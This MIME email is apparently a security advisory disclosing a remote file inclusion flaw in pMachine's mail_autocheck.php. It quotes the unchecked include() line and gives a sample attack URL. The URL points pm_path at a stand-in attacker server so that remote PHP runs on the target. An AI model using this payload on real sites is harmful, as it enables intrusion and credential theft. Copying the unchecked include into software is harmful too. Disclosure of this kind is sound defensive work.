This is a multi-part message in MIME format. ------=_NextPart_000_0000_01C516AC.9C269F50 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit pMachine Pro / pMachine Free Remote Code Execution vendor website: http://www.pmachine.com I. BACKGROUND PMachine is one of the most flexible & creative on-line publishing tools available. With PMachine you can publish any kind of web content - from a basic weblog to an advanced, interactive magazine. Easy to use, even for those new to BLOGing! Even the most inexperienced user can have their weblog up and running in 10 minutes or less. II. DESCRIPTION A remote attacker is able to execute commands with the privileges of the underlying webserver. Under special circumstances the attacker is also in place to escalate his privileges and gain full access to the affected system. The file containing the vulnerability is placed at pm/add_ons/mail_this_entry/mail_autocheck.php from the pMachine root directory. This file contains the following PHP code: as no check was done to the user supplied $pm_path variable it is possible to include a remote php script and take advantage of this typical PHP include() vulnerability. Followed is a sample attack to the pMachine hosting server: http://targetserver/pMachine/pm/add_ons/mail_this_entry/ mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php? The question mark at the very end of this URL will truncate the appended "mailserver".$sfx of the vulnerable pMachine code. III. ANALYSIS Remote exploitation allows an attacker to execute arbitrary commands and code under the privileges of the web server. This also opens the door to privilege escalation attacks. In junction with other unpatched vulnerabilities (the recent curl issue) the attacker is able to read any file on the system even without escalating his privileges. For example on an shared website server and read out secret account credentials. IV. DETECTION The latest pMachine Pro and pMachine Free release is vulnerable to the attack described above. kcope - kingcope[at]gmx.net ------=_NextPart_000_0000_01C516AC.9C269F50 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable
pMachine Pro / pMachine Free Remote = Code=20 Execution
vendor website: http://www.pmachine.com
=
 
I. BACKGROUND
PMachine is one of the = most=20 flexible & creative on-line publishing
tools available.  = With=20 PMachine you can publish any kind of
web content - from a basic = weblog to an=20 advanced, interactive magazine.
Easy to use, even for those new to=20 BLOGing!
Even the most inexperienced user can have their weblog up = and=20 running
in 10 minutes or less.
 
II. DESCRIPTION
A remote attacker is = able to=20 execute commands with the privileges
of the underlying webserver. = Under=20 special circumstances the attacker
is also in place to escalate his=20 privileges and gain full access to the
affected system.
 
The file containing the vulnerability = is placed=20 at
 
pm/add_ons/mail_this_entry/mail_autocheck.php
 
from the pMachine root directory. This = file=20 contains the following
PHP code:
 
<?php = include($pm_path."mailserver".$sfx);=20 ?>
 
as no check was done to the user = supplied $pm_path=20 variable it
is possible to include a remote php script and take = advantage=20 of
this typical PHP include() vulnerability.
 
Followed is a sample attack to the = pMachine hosting=20 server:
http://= targetserver/pMachine/pm/add_ons/mail_this_entry/
mail_autocheck.p= hp?pm_path=3Dhttp://attackers-webserver/malicious-code.php?
 
The question mark at the = very end of this URL will truncate = the
appended=20 "mailserver".$sfx of the vulnerable pMachine code.
 
III. ANALYSIS
 
Remote exploitation allows an attacker = to execute=20 arbitrary commands
and code under the privileges of the web server. = This also=20 opens the
door to privilege escalation attacks.
In junction with = other=20 unpatched vulnerabilities (the recent curl issue)
the attacker is = able to=20 read any file on the system even without
escalating his = privileges.
For=20 example on an shared website server and read out secret=20 account
credentials.
 
IV. DETECTION
The latest pMachine = Pro and=20 pMachine Free release is vulnerable to
the attack described=20 above.
 
kcope - = kingcope[at]gmx.net
 
------=_NextPart_000_0000_01C516AC.9C269F50--